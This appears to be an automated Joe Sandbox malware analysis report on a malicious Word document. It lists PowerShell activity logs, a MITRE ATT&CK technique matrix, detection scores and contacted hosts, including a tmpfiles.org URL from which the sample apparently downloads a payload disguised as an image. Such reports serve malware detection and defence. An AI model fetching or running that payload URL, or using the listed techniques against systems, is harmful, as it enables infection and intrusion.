Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	13 Exploitation for Client Execution	2 Scripting	1 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	1 DLL Side-Loading	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
test.doc.bin.doc	51%	Virustotal		Browse
test.doc.bin.doc	34%	ReversingLabs	Script-Macro.Trojan.Valyria
test.doc.bin.doc	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\Desktop\~WRD0000.tmp	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://tmpfiles.org	0%	Avira URL Cloud	safe
http://www.microsoft.cog	0%	Avira URL Cloud	safe
https://tmpfiles.org/dl/18712758/rgvsozgu8x.jpg	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false		high
tmpfiles.org	104.21.21.16	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://tmpfiles.org/dl/18712758/rgvsozgu8x.jpg	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000007.00000002.2134030741.00000000056C9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000007.00000002.2130901589.00000000048B4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://tmpfiles.org	powershell.exe, 00000007.00000002.2130901589.00000000047B7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.cog	powershell.exe, 00000007.00000002.2139021203.0000000006DCE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000007.00000002.2130901589.00000000047B7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000007.00000002.2130901589.00000000048B4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000007.00000002.2130901589.0000000004661000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000007.00000002.2130901589.00000000047B7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000007.00000002.2130901589.0000000004EA3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000007.00000002.2130901589.00000000048B4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000007.00000002.2134030741.00000000056C9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000007.00000002.2134030741.00000000056C9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000007.00000002.2134030741.00000000056C9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000007.00000002.2134030741.00000000056C9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000007.00000002.2130901589.0000000004661000.00000004.00000800.00020000.00000000.sdmp	false		high
http://go.micros	powershell.exe, 00000007.00000002.2130901589.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000007.00000002.2130901589.00000000047B7000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.21.16	tmpfiles.org	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583048
Start date and time:	2025-01-01 17:09:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	test.doc.bin.doc
Detection:	MAL
Classification:	mal96.expl.evad.winDOC@5/14@1/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 11 Number of non-executed functions: 4
Cookbook Comments:	Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.109.28.46, 52.113.194.132, 52.109.68.129, 199.232.210.172, 184.28.90.27, 52.111.236.34, 52.111.236.35, 52.111.236.32, 52.111.236.33, 51.104.15.252, 95.101.111.179, 95.101.111.168, 40.126.32.74, 20.12.23.50, 13.107.246.45
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, templatesmetadata.office.net.edgekey.net, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, frc-azsc-000.roaming.officeapps.live.com, officeclient.microsoft.com, templatesmetadata.office.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, osiprod-frc-buff-azsc-000.francecentral.cloudapp.azure.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, prod1.naturallanguageeditorservice.osi.office.net.akadns.net, nleditor.osi.office.net, e267
Execution Graph export aborted for target powershell.exe, PID 6980 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:10:08	API Interceptor	26x Sleep call for process: powershell.exe modified

LLM Input / Output

Input	Output
URL: Screenshot id: 6 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

